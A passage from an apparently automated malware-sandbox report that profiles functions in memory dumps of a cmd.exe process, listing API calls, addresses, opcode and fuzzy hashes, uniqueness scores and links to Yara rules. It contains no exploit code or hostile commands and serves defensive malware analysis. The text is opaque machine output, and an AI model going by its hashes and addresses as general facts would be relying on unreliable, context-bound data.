                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                        • String ID:
                                                                                        • API String ID: 1535828850-0
                                                                                        • Opcode ID: ecbbaa61b05a459484c848fa0d669e0eb93ef7dcf9c1cd2d62a5347be2c41b2e
                                                                                        • Instruction ID: 3a7ebc5fb5877230e628cec616402ccdb5bb3733804ad607ca30fa882cbfc017
                                                                                        • Opcode Fuzzy Hash: ecbbaa61b05a459484c848fa0d669e0eb93ef7dcf9c1cd2d62a5347be2c41b2e
                                                                                        • Instruction Fuzzy Hash: 76C16075900215CFCB64DF18D890BA9B7B6FF49314F5881AEE44A97391EB309D81CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D65190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_setjmp3
                                                                                        • String ID:
                                                                                        • API String ID: 4215035025-0
                                                                                        • Opcode ID: 983b27bd00970b732d1fcd786aec419d6b2e53707c2beff199d5f8761f55a545
                                                                                        • Instruction ID: bf0f544fb6a3eade2bfc907f708badbc6eaccc3c9d46bc4b1ef4f79ce10e733e
                                                                                        • Opcode Fuzzy Hash: 983b27bd00970b732d1fcd786aec419d6b2e53707c2beff199d5f8761f55a545
                                                                                        • Instruction Fuzzy Hash: 87517471E013299BCB20CBA5ECA4AEEBB74FB44740F144199E509E3244EB349E84CF75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D895F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 1670951261-0
                                                                                        • Opcode ID: dd70ff46b39897140c97c7396b5fa589fb035fc2b2ca193c171d5def2219e0d8
                                                                                        • Instruction ID: 74c5106022074e90d5f1f1a2a520de6dc2aa50e1a94daae267bf5f1eeb64ad2a
                                                                                        • Opcode Fuzzy Hash: dd70ff46b39897140c97c7396b5fa589fb035fc2b2ca193c171d5def2219e0d8
                                                                                        • Instruction Fuzzy Hash: 5E417171A102195BDF24DAA5DC95BAEF7B8EF44344F0801A9E545E3241EB34DE84CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D894E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D89527
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8952F
                                                                                        • _get_osfhandle.MSVCRT ref: 00D895B5
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D895BD
                                                                                          • Part of subcall function 00D88C50: longjmp.MSVCRT(00DA0A70,00000001,00D6206C,00D65E68,?,?,?,?,00000000), ref: 00D88CC4
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D1D
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D45
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D6D
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D895CC
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 288106245-0
                                                                                        • Opcode ID: 148eb5df26299d65558698bde5b2cb71eaa1d11b2989327d107cbebfd0e1b0b0
                                                                                        • Instruction ID: 6de4daeb5071b8727c2814795a441190040279b8f5f0502051775e2626beadc8
                                                                                        • Opcode Fuzzy Hash: 148eb5df26299d65558698bde5b2cb71eaa1d11b2989327d107cbebfd0e1b0b0
                                                                                        • Instruction Fuzzy Hash: E731B371A00204AFEF19EF74D859BBEB769EB85310F288169F542D6284DB74DD418B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7260E Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D72650
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7F339
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D7F347
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,?,00000104,00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D7F383
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00D787F0,?,?,?,00D787F0,00000000,?,00D64A0A), ref: 00D7F390
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 158340877-0
                                                                                        • Opcode ID: d3bd5b6ccb0865a9d8787e9447bfa2057da86329567fbae5501f89fb0cb995ba
                                                                                        • Instruction ID: 8aeb415171f1bc0016155474c2d9d09cb283f7fbfb412030bde6650ae45557d5
                                                                                        • Opcode Fuzzy Hash: d3bd5b6ccb0865a9d8787e9447bfa2057da86329567fbae5501f89fb0cb995ba
                                                                                        • Instruction Fuzzy Hash: 04317C71A103059FD724AF79D885A7EB7F8EF48B16B14852EE88AC2250FB74D805CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D74CC2
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D88FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00D74CCA
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D80BFC
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D80C48
                                                                                        • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D80C71
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3588551418-0
                                                                                        • Opcode ID: 1c0532200d508ed7cc5989cd96ccf3f92d6d4be1d1967074d42c6ab711eb838f
                                                                                        • Instruction ID: b76653f8e6f167fc43e1661fdb82d203fd0233c0d4fd62b6e057ceb6225e77af
                                                                                        • Opcode Fuzzy Hash: 1c0532200d508ed7cc5989cd96ccf3f92d6d4be1d1967074d42c6ab711eb838f
                                                                                        • Instruction Fuzzy Hash: A831BF71600205AFEB29AF68D845A7F7B6AEF85304B24852AF846D7250EB34DC40DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E29B
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6E2A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1013686580-0
                                                                                        • Opcode ID: b23da2671691e09482243967af0a3ff8e1c9b0b865b0baeb639dd93ae25b62fd
                                                                                        • Instruction ID: 3cbd64d370b9ed4cdc48879c1adbab5749fe4c3307d672de6897cc49f1d5700d
                                                                                        • Opcode Fuzzy Hash: b23da2671691e09482243967af0a3ff8e1c9b0b865b0baeb639dd93ae25b62fd
                                                                                        • Instruction Fuzzy Hash: A811A031204200AFD2282BA8EC4AB257B76EF89721F358516F109DA2E0EB719C50DA35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D88550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D88571
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00D8857E
                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00D885C7
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00D885D5
                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D885DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3008996577-0
                                                                                        • Opcode ID: ccf55faa8c605d60913d1930a1ec99b844b2e2d0fa4daaa8cb2e151c2d6b1f98
                                                                                        • Instruction ID: 3dc7b7851f42e0c4f863c954c4c20fa4d7c69a87b7bbe8024ab2d84bf6094fcc
                                                                                        • Opcode Fuzzy Hash: ccf55faa8c605d60913d1930a1ec99b844b2e2d0fa4daaa8cb2e151c2d6b1f98
                                                                                        • Instruction Fuzzy Hash: 9111F935910349ABCB05EFB8DC05AEEB7B8EF0D710F10425AE515E7290EB349905CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D71F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D70A41), ref: 00D71F1A
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D71F2B
                                                                                        • memset.MSVCRT ref: 00D71F45
                                                                                        • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00D7F185
                                                                                        • memset.MSVCRT ref: 00D7F1FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                        • String ID:
                                                                                        • API String ID: 1263632223-0
                                                                                        • Opcode ID: 5f810b7e7726dc5bb898548e49450851f04323252c4872623f4e1fd8dbd9020a
                                                                                        • Instruction ID: 9e67d835c67637da516e210c0b5daed6d52c4195928cb2782a16cdd1694fc39f
                                                                                        • Opcode Fuzzy Hash: 5f810b7e7726dc5bb898548e49450851f04323252c4872623f4e1fd8dbd9020a
                                                                                        • Instruction Fuzzy Hash: 68114CB5E28312B9DB315F18DC067617654AB01301F8C9277ECCDD5295F7648C819B79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D770F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00D77122
                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D77131
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D7713A
                                                                                        • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00D77143
                                                                                        • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00D77158
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 1445889803-0
                                                                                        • Opcode ID: b0e9132a8381070998adad485214903e14c4bc56c28d1c57042f91590d10314e
                                                                                        • Instruction ID: 8f365da3ef1dd12dd94b35f2cbf445d41f7a4dc26150389b617730c8f5f6ec4b
                                                                                        • Opcode Fuzzy Hash: b0e9132a8381070998adad485214903e14c4bc56c28d1c57042f91590d10314e
                                                                                        • Instruction Fuzzy Hash: 4111F571D15308ABCB10DBB8DA4869EB7F5BB58311FA65965D806EB260E7309B00CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D84840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D8484A
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D84879
                                                                                        • _getch.MSVCRT ref: 00D8487F
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D84897
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D848AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                        • String ID:
                                                                                        • API String ID: 491502236-0
                                                                                        • Opcode ID: 6b4ba06d4200f4d5b2ec20e8dc85d32b47c225884a4bdf26a1d2c4d849414376
                                                                                        • Instruction ID: a74fc8a91395dd636ac0f432dd7d909e78364dd0216eff42f716e16dd8ad785b
                                                                                        • Opcode Fuzzy Hash: 6b4ba06d4200f4d5b2ec20e8dc85d32b47c225884a4bdf26a1d2c4d849414376
                                                                                        • Instruction Fuzzy Hash: D0018F36104351BFEB55BBA5AC0AB6E7B78DF02724F15021AF805D62E0DBB58940CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6A9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
                                                                                        • memcpy.MSVCRT ref: 00D6AA09
                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 713576409-0
                                                                                        • Opcode ID: 6f02563b7d5b267837190c940491941bf39ded131d6e5122f2d751fe93869a6e
                                                                                        • Instruction ID: 9bb6873d527156339ed830a14f1a4c17b985607a4749ea16f2d47424aa79de95
                                                                                        • Opcode Fuzzy Hash: 6f02563b7d5b267837190c940491941bf39ded131d6e5122f2d751fe93869a6e
                                                                                        • Instruction Fuzzy Hash: 56E0127760172077D211676D6D88D7F2A5DDBCA661B0A0115F949E3301DF298C06CAB3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D66488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D66513: memset.MSVCRT ref: 00D66593
                                                                                          • Part of subcall function 00D6DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00D68E86,00D68E5A,00000000), ref: 00D6DC98
                                                                                          • Part of subcall function 00D6DC60: RtlFreeHeap.NTDLL(00000000), ref: 00D6DC9F
                                                                                        • memset.MSVCRT ref: 00D7A097
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapmemset$FreeProcess
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1291122668-438819550
                                                                                        • Opcode ID: 213e3dbd493f1b79466c2b897f3baae6c6d490962e42c59eb3cc48cd81b96c5b
                                                                                        • Instruction ID: 3216e55c31be028730c1c6a2d059d71ae3ff0f35b64489ac2367abff5a5808a2
                                                                                        • Opcode Fuzzy Hash: 213e3dbd493f1b79466c2b897f3baae6c6d490962e42c59eb3cc48cd81b96c5b
                                                                                        • Instruction Fuzzy Hash: 95B1A271E00219AFDF24DFA8C845AAEB7B1EF98710F198059EC09AB255E731DD41CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D85948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D85997
                                                                                          • Part of subcall function 00D6AB7F: iswspace.MSVCRT ref: 00D6AB8D
                                                                                          • Part of subcall function 00D6AB7F: wcschr.MSVCRT ref: 00D6AB9E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enumiswspacewcschr
                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                        • API String ID: 3493821229-3301834661
                                                                                        • Opcode ID: c277076c2d5263b1999528082a0a1b8fcff36eb01aa100ad5cf877bb17f88b75
                                                                                        • Instruction ID: 412b75487694f720b2de9b8f8ce114e3368ecbab1d933b88578aed2ec4c97d19
                                                                                        • Opcode Fuzzy Hash: c277076c2d5263b1999528082a0a1b8fcff36eb01aa100ad5cf877bb17f88b75
                                                                                        • Instruction Fuzzy Hash: CA814E71E006195BCF28BB28ECD5BFA737AEF94704F1841A9E40A97244EA709E418F70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@$@wyu
                                                                                        • API String ID: 0-214780934
                                                                                        • Opcode ID: 06518f24bd19eb30d19667dd9804c1508b84c7cfe21222d84120b5635f269b9e
                                                                                        • Instruction ID: 0fab3a91aee898abbdcf2c91b99f6a144edb548d31d349852738c66540d5d411
                                                                                        • Opcode Fuzzy Hash: 06518f24bd19eb30d19667dd9804c1508b84c7cfe21222d84120b5635f269b9e
                                                                                        • Instruction Fuzzy Hash: B2813B75D002699BDB31DB54CC44BEEB7B8AF48714F0445EAEA09BB240E7709E84DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
